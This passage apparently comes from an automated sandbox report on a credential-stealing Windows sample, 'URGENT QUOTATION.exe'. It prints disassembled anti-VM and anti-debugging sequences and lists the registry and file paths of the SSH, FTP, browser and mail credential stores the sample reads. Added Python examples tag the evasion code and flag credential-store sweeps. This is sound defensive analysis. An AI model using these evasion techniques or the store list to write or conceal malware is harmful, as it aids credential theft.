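    struct.pack_into("<II", img, opt + 56, 0x2000, 0x200)                     # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", img, opt + 68, 2)                                  # Subsystem: Windows GUI
    struct.pack_into("<I", img, opt + 92, 16)                                 # NumberOfRvaAndSizes
    sec = opt + 0xE0
    img[sec:sec + 8] = b".text\0\0\0"
    struct.pack_into("<IIII", img, sec + 8, 0x10, 0x1000, 0x200, 0x200)       # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<I", img, sec + 36, 0x60000020)                         # CODE | EXECUTE | READ
    img[0x200:0x210] = b"\xCC" * 16                                           # constructed section bytes
    return bytes(img)


if __name__ == "__main__":
    image = build_sample_image()
    stored, real, ok = verify_pe_checksum(image)
    print(f"real checksum: {stored:#x} should be: {real:#x} ({'ok' if ok else 'mismatch'})")
    print("after fix:", verify_pe_checksum(set_pe_checksum(image)))
```

Because the CheckSum field is skipped during the sum, writing the correct value into the header does not change the recomputed result, which is why the check is self-consistent; the Windows loader only enforces it for drivers and a few system images, so user-mode malware is free to ship a wrong one.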
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218321F push ebx; iretd 0_2_02183222
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218020B push ebx; iretd 0_2_0218020E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02185A39 push ebx; iretd 0_2_02185A3A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218223D push ebx; iretd 0_2_0218223E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218023F push ebx; iretd 0_2_02180242
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181A31 push ebx; iretd 0_2_02181A32
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180227 push ebx; iretd 0_2_0218022A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218525B push ebx; iretd 0_2_0218525E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218024B push ebx; iretd 0_2_0218024E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218527B push ebx; iretd 0_2_0218527E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02185A7B push ebx; iretd 0_2_02185A7E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218127F push ebx; iretd 0_2_02181282
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218526F push ebx; iretd 0_2_02185272
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02186261 push ebx; iretd 0_2_02186262
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182A63 push ebx; iretd 0_2_02182A66
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218129D push ebx; iretd 0_2_0218129E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180297 push ebx; iretd 0_2_0218029A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180287 push ebx; iretd 0_2_0218028A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802B9 push ebx; iretd 0_2_021802BA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182AAF push ebx; iretd 0_2_02182AB2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802A3 push ebx; iretd 0_2_021802A6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02184AA5 push ebx; iretd 0_2_02184AA6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021852A5 push ebx; iretd 0_2_021852A6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021832DB push ebx; iretd 0_2_021832DE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802D7 push ebx; iretd 0_2_021802DA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021842C9 push ebx; iretd 0_2_021842CA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802CD push ebx; iretd 0_2_021802CE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021852CD push ebx; iretd 0_2_021852CE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802C3 push ebx; iretd 0_2_021802C6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021852F9 push ebx; iretd 0_2_021852FA
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021802F3 push ebx; iretd 0_2_021802F6
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions:
  0x00000000 rdtsc
  0x00000002 xor eax, eax
  0x00000004 inc eax
  0x00000005 cpuid
  0x00000007 popad
  0x00000008 call 00007F270CB2D938h
  0x0000000d lfence
  0x00000010 mov edx, dword ptr [7FFE0014h]
  0x00000016 lfence
  0x00000019 ret
  0x0000001a sub edx, esi
  0x0000001c ret
  0x0000001d jmp 00007F270CB2D946h
  0x0000001f cmp ah, FFFFFFFFh
  0x00000022 add edi, edx
  0x00000024 dec dword ptr [ebp+000000F8h]
  0x0000002a jmp 00007F270CB2D942h
  0x0000002c cmp bx, ax
  0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h
  0x00000036 jne 00007F270CB2D8EEh
  0x00000038 call 00007F270CB2D9AEh
  0x0000003d call 00007F270CB2D948h
  0x00000042 lfence
  0x00000045 mov edx, dword ptr [7FFE0014h]
  0x0000004b lfence
  0x0000004e ret
  0x0000004f mov esi, edx
  0x00000051 pushad
  0x00000052 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions:
  0x00000000 rdtsc
  0x00000002 mov eax, 00000001h
  0x00000007 cpuid
  0x00000009 popad
  0x0000000a pushad
  0x0000000b lfence
  0x0000000e rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: URGENT QUOTATION.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions:
  0x00000000 rdtsc
  0x00000002 xor eax, eax
  0x00000004 inc eax
  0x00000005 cpuid
  0x00000007 popad
  0x00000008 call 00007F270CB2D938h
  0x0000000d lfence
  0x00000010 mov edx, dword ptr [7FFE0014h]
  0x00000016 lfence
  0x00000019 ret
  0x0000001a sub edx, esi
  0x0000001c ret
  0x0000001d jmp 00007F270CB2D946h
  0x0000001f cmp ah, FFFFFFFFh
  0x00000022 add edi, edx
  0x00000024 dec dword ptr [ebp+000000F8h]
  0x0000002a jmp 00007F270CB2D942h
  0x0000002c cmp bx, ax
  0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h
  0x00000036 jne 00007F270CB2D8EEh
  0x00000038 call 00007F270CB2D9AEh
  0x0000003d call 00007F270CB2D948h
  0x00000042 lfence
  0x00000045 mov edx, dword ptr [7FFE0014h]
  0x0000004b lfence
  0x0000004e ret
  0x0000004f mov esi, edx
  0x00000051 pushad
  0x00000052 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218524C second address: 000000000218524C instructions:
  0x00000000 rdtsc
  0x00000002 lfence
  0x00000005 shl edx, 20h
  0x00000008 or edx, eax
  0x0000000a ret
  0x0000000b mov esi, edx
  0x0000000d pushad
  0x0000000e xor eax, eax
  0x00000010 inc eax
  0x00000011 cpuid
  0x00000013 bt ecx, 1Fh
  0x00000017 jc 00007F270C364061h
  0x0000001d popad
  0x0000001e call 00007F270C363C6Ah
  0x00000023 lfence
  0x00000026 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218091B second address: 000000000218091B instructions:
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002183842 second address: 0000000002183850 instructions:
  0x00000000 rdtsc
  0x00000002 mov eax, 00000001h
  0x00000007 cpuid
  0x00000009 popad
  0x0000000a pushad
  0x0000000b lfence
  0x0000000e rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000002180A17 second address: 0000000002180A17 instructions:
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000056524C second address: 000000000056524C instructions:
  0x00000000 rdtsc
  0x00000002 lfence
  0x00000005 shl edx, 20h
  0x00000008 or edx, eax
  0x0000000a ret
  0x0000000b mov esi, edx
  0x0000000d pushad
  0x0000000e xor eax, eax
  0x00000010 inc eax
  0x00000011 cpuid
  0x00000013 bt ecx, 1Fh
  0x00000017 jc 00007F270C364061h
  0x0000001d popad
  0x0000001e call 00007F270C363C6Ah
  0x00000023 lfence
  0x00000026 rdtsc
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000000564C8B second address: 0000000000564C8B instructions:
  0x00000000 rdtsc
  0x00000002 lfence
  0x00000005 shl edx, 20h
  0x00000008 or edx, eax
  0x0000000a popad
  0x0000000b xor word ptr [eax+ebx], cx
  0x0000000f cmp ebx, 0000033Dh
  0x00000015 jnl 00007F270CB2D94Bh
  0x00000017 add ebx, 02h
  0x0000001a jmp 00007F270CB2D8FCh
  0x0000001c jmp 00007F270CB2D946h
  0x0000001e pushad
  0x0000001f lfence
  0x00000022 rdtsc
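The intercepted sequences above show three distinct things between a pair of rdtsc reads: a loop that keeps executing cpuid and rdtsc (both cause VM exits) while measuring elapsed wall-clock time through the SystemTime field of KUSER_SHARED_DATA ([7FFE0014h], offset 0x14 of the page mapped at 0x7FFE0000, so no timing API is called for a hook to see); a CPUID leaf-1 test of the hypervisor-present flag (bt ecx, 1Fh); and a 16-bit XOR decoding loop (xor word ptr [eax+ebx], cx over 0x33D bytes) bracketed by two time-stamp reads. The script below is an added example and is not code from this report or from the sample: it parses interceptor lines in the one-line form the sandbox prints them and tags which of those techniques each sequence shows. The tag names, the two constants and the regular expressions are this example's own choices; the three sample lines are copied from this report.

```python
"""Tag the anti-VM technique in each "RDTSC instruction interceptor" line.

Added example for this page, not code from the report or from the sample.
Tag names, the two constants and the regexes are this example's own.
"""
import re
from dataclasses import dataclass, field

# KUSER_SHARED_DATA is mapped at 0x7FFE0000 in every 32-bit process; its
# SystemTime field is at offset 0x14, so [7FFE0014h] is an API-free clock read.
KUSER_SYSTEMTIME = 0x7FFE0014
HV_PRESENT_BIT = 0x1F        # CPUID.1:ECX[31] is the "hypervisor present" flag

HEADER_RE = re.compile(
    r"First address:\s*([0-9A-Fa-f]+)\s+second address:\s*([0-9A-Fa-f]+)"
    r"\s+instructions:\s*(.*)$")
# one instruction = 8-digit hex offset, then text up to the next offset
INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8})\s+(.+?)(?=\s+0x[0-9A-Fa-f]{8}\s|$)")

# Sample input: three interceptor lines copied verbatim from this report.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218522C second address: 000000000218522C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F270CB2D938h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F270CB2D946h 0x0000001f cmp ah, FFFFFFFFh 0x00000022 add edi, edx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a jmp 00007F270CB2D942h 0x0000002c cmp bx, ax 0x0000002f cmp dword ptr [ebp+000000F8h], 00000000h 0x00000036 jne 00007F270CB2D8EEh 0x00000038 call 00007F270CB2D9AEh 0x0000003d call 00007F270CB2D948h 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc",
    r"Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 000000000218524C second address: 000000000218524C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F270C364061h 0x0000001d popad 0x0000001e call 00007F270C363C6Ah 0x00000023 lfence 0x00000026 rdtsc",
    r"Source: C:\Users\user\Desktop\URGENT QUOTATION.exe RDTSC instruction interceptor: First address: 0000000000564C8B second address: 0000000000564C8B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor word ptr [eax+ebx], cx 0x0000000f cmp ebx, 0000033Dh 0x00000015 jnl 00007F270CB2D94Bh 0x00000017 add ebx, 02h 0x0000001a jmp 00007F270CB2D8FCh 0x0000001c jmp 00007F270CB2D946h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc",
]


@dataclass
class Sequence:
    first: int
    second: int
    insns: list                      # (offset, mnemonic, operands)
    tags: set = field(default_factory=set)


def parse_instructions(stream: str) -> list:
    out = []
    for m in INSN_RE.finditer(stream):
        mnem, _, ops = m.group(2).strip().partition(" ")
        out.append((int(m.group(1), 16), mnem.lower(), ops.strip()))
    return out


def imm(text: str):
    """Value of a MASM-style immediate such as '00000001h', else None."""
    s = text.strip()
    if s.endswith("h") and "[" not in s:
        try:
            return int(s[:-1], 16)
        except ValueError:
            pass
    return None


def classify(insns: list) -> set:
    tags = set()
    mnems = [m for _, m, _ in insns]
    if mnems.count("rdtsc") >= 2:
        tags.add("rdtsc-pair")                # bracketed by two TSC reads
    eax, leaves, saw_leaf1 = None, [], False   # tiny tracker for the CPUID leaf
    for i, (_, m, o) in enumerate(insns):
        low = o.lower()
        if m == "xor" and low == "eax, eax":
            eax = 0
        elif m == "inc" and low == "eax" and eax is not None:
            eax += 1
        elif m == "mov" and low.startswith("eax,"):
            eax = imm(o.split(",", 1)[1])
        elif m == "cpuid":
            leaves.append(eax)
            saw_leaf1 = saw_leaf1 or eax == 1
            eax = None
        elif m == "call":
            eax = None                        # callee may clobber eax
        if (m == "bt" and saw_leaf1 and low.startswith("ecx,")
                and imm(o.split(",", 1)[1]) == HV_PRESENT_BIT):
            tags.add("hypervisor-bit-test")
        if m == "mov" and f"[{KUSER_SYSTEMTIME:x}h]" in low:
            tags.add("kuser-systemtime-read")
        if (m == "shl" and low == "edx, 20h" and i + 1 < len(insns)
                and insns[i + 1][1] == "or" and insns[i + 1][2].lower() == "edx, eax"):
            tags.add("tsc-64bit-combine")     # edx:eax folded into one 64-bit stamp
    cond_jump = any(m.startswith("j") and m != "jmp" for m in mnems)
    counter = any(m in ("inc", "dec", "add", "sub") and not o.lower().startswith("eax")
                  for _, m, o in insns)
    if "rdtsc-pair" in tags and cond_jump and counter:
        tags.add("timed-loop")                # looped work between the two reads
        if leaves:
            tags.add("cpuid-hammering")       # VM-exiting instruction inside the loop
    return tags


def analyse(report_line: str) -> Sequence:
    m = HEADER_RE.search(report_line)
    if m is None:
        raise ValueError("not an RDTSC interceptor line")
    seq = Sequence(int(m.group(1), 16), int(m.group(2), 16), parse_instructions(m.group(3)))
    seq.tags = classify(seq.insns)
    return seq


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        s = analyse(line)
        print(f"{s.first:08X}  {len(s.insns):2d} insns  {', '.join(sorted(s.tags))}")
```

Run against a whole report the tags separate the wall-clock hammering loop (the one a sandbox can defeat only by keeping SystemTime advancing realistically) from the plain hypervisor-bit check, which a hypervisor can simply hide.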
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021853EC rdtsc 0_2_021853EC
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6884 Thread sleep count: 91 > 30
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe TID: 6660 Thread sleep time: -60000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Last function: Thread delayed
Source: URGENT QUOTATION.exe Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218613D NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,? 0_2_0218613D (ThreadInformationClass 00000011h = ThreadHideFromDebugger)
Hides threads from debuggers
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process queried: DebugPort (ProcessDebugPort, non-zero while a debugger is attached)
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021853EC rdtsc 0_2_021853EC
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021830FC LdrInitializeThunk, 0_2_021830FC
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02182BF7 mov eax, dword ptr fs:[00000030h] 0_2_02182BF7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218182B mov eax, dword ptr fs:[00000030h] 0_2_0218182B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021846D2 mov eax, dword ptr fs:[00000030h] 0_2_021846D2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021846D7 mov eax, dword ptr fs:[00000030h] 0_2_021846D7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181F7A mov eax, dword ptr fs:[00000030h] 0_2_02181F7A
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181F7D mov eax, dword ptr fs:[00000030h] 0_2_02181F7D
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218578B mov eax, dword ptr fs:[00000030h] 0_2_0218578B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_0218578F mov eax, dword ptr fs:[00000030h] 0_2_0218578F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021857AE mov eax, dword ptr fs:[00000030h] 0_2_021857AE
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181FAF mov eax, dword ptr fs:[00000030h] 0_2_02181FAF
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021857C9 mov eax, dword ptr fs:[00000030h] 0_2_021857C9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_021857E7 mov eax, dword ptr fs:[00000030h] 0_2_021857E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02181D7E mov eax, dword ptr fs:[00000030h] 0_2_02181D7E
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02184DA0 mov eax, dword ptr fs:[00000030h] 0_2_02184DA0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02184DA3 mov eax, dword ptr fs:[00000030h] 0_2_02184DA3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00564DA3 mov eax, dword ptr fs:[00000030h] 4_2_00564DA3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00564DA0 mov eax, dword ptr fs:[00000030h] 4_2_00564DA0
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005646D7 mov eax, dword ptr fs:[00000030h] 4_2_005646D7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005646D2 mov eax, dword ptr fs:[00000030h] 4_2_005646D2
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005657C9 mov eax, dword ptr fs:[00000030h] 4_2_005657C9
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562BF3 mov eax, dword ptr fs:[00000030h] 4_2_00562BF3
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005657E7 mov eax, dword ptr fs:[00000030h] 4_2_005657E7
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_00562BE1 mov eax, dword ptr fs:[00000030h] 4_2_00562BE1
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056578F mov eax, dword ptr fs:[00000030h] 4_2_0056578F
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056578B mov eax, dword ptr fs:[00000030h] 4_2_0056578B
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_005657AE mov eax, dword ptr fs:[00000030h] 4_2_005657AE
Enables debug privileges
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory, 4_2_0056216A

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Process created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Code function: 0_2_02180701 cpuid 0_2_02180701
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
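The keys and the file listed in this section are the credential stores of unrelated applications (an SSH client, WinSCP, three FTP clients, Chrome, two mail clients); no single legitimate program reads all of them, and that breadth is a better detection signal than any one path. The script below is an added example and is not code from this report or from the sample: it runs that rule over process-behaviour log lines and alerts when one process reads stores belonging to several application families. The log format, the store table, the thresholds and the two benign processes are this example's own assumptions; the stealer's paths are the ones listed above, and the PuTTY entry in the table is an addition not taken from the report.

```python
"""Alert on one process sweeping credential stores of unrelated applications.

Added example for this page, not code from the report or from the sample.
The log format, the store table, the thresholds and the two benign
processes are this example's own assumptions.
"""
import re
from collections import defaultdict

# (lower-case path fragment, application family, credential category)
STORES = [
    (r"\software\9bis.com\kitty\sessions", "KiTTY", "ssh"),
    (r"\software\simontatham\putty\sessions", "PuTTY", "ssh"),   # assumed, not in the report
    (r"\software\martin prikryl", "WinSCP", "ftp"),
    (r"\software\far\plugins\ftp\hosts", "Far FTP", "ftp"),
    (r"\software\far2\plugins\ftp\hosts", "Far2 FTP", "ftp"),
    (r"\software\nch software\classicftp\ftpaccounts", "ClassicFTP", "ftp"),
    (r"\google\chrome\user data\default\login data", "Chrome", "browser"),
    (r"\software\incredimail\identities", "IncrediMail", "mail"),
    (r"\windows messaging subsystem\profiles\outlook", "Outlook", "mail"),
]

# "<pid> <image> <operation>: <path>", one event per line (constructed format)
LOG_RE = re.compile(r"^(\d+)\s+(.+?)\s+(Key opened|File opened):\s+(.+)$")

# Constructed log: the stealer's accesses from this report plus two benign
# processes that each touch only their own store.
SAMPLE_LOG = r"""
6660 URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
6660 URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
6660 URGENT QUOTATION.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
6660 URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
6660 URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
6660 URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
6660 URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
6660 URGENT QUOTATION.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
4120 WinSCP.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
4120 WinSCP.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
5200 chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
"""


def parse_log(text: str) -> list:
    events = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            events.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return events


def match_store(path: str):
    """Return (family, category) if the path is a known credential store."""
    p = path.lower().replace("/", "\\")
    for needle, family, category in STORES:
        if needle in p:
            return family, category
    return None


def detect(log_text: str, min_families: int = 3, min_categories: int = 2) -> list:
    """One alert per process whose store reads span >= min_families
    application families and >= min_categories credential categories."""
    seen = defaultdict(lambda: {"image": "", "families": set(), "categories": set(), "hits": 0})
    for pid, image, _op, path in parse_log(log_text):
        hit = match_store(path)
        if hit is None:
            continue
        rec = seen[pid]
        rec["image"] = image
        rec["families"].add(hit[0])
        rec["categories"].add(hit[1])
        rec["hits"] += 1
    alerts = []
    for pid, rec in sorted(seen.items()):
        if len(rec["families"]) >= min_families and len(rec["categories"]) >= min_categories:
            alerts.append({"pid": pid, "image": rec["image"],
                           "families": sorted(rec["families"]),
                           "categories": sorted(rec["categories"]),
                           "hits": rec["hits"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"pid {a['pid']} ({a['image']}): {a['hits']} credential-store reads "
              f"across {', '.join(a['categories'])}: {', '.join(a['families'])}")
```

The thresholds keep WinSCP reading its own sessions and Chrome opening its own Login Data silent; the sample trips the rule because one process spans four categories and eight families within a single run.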
Behavior Graph

Behavior Graph ID: 356236  Sample: URGENT QUOTATION.exe  Startdate: 22/02/2021  Architecture: WINDOWS  Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; 8 other signatures

URGENT QUOTATION.exe (started)
  Signatures: Tries to detect Any.run; Hides threads from debuggers
  URGENT QUOTATION.exe (child process, started)
    DNS/IP: 51.195.53.221, 49743, 49744, 49745 (OVHFR, France); onedrive.live.com; 2 other IPs or domains
    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; 3 other signatures

Contacted Public IPs

IP             Domain   Country  ASN    ASN Name  Malicious
51.195.53.221  unknown  France   16276  OVHFR     true

Contacted Domains

Name IP Active
onedrive.live.com unknown unknown
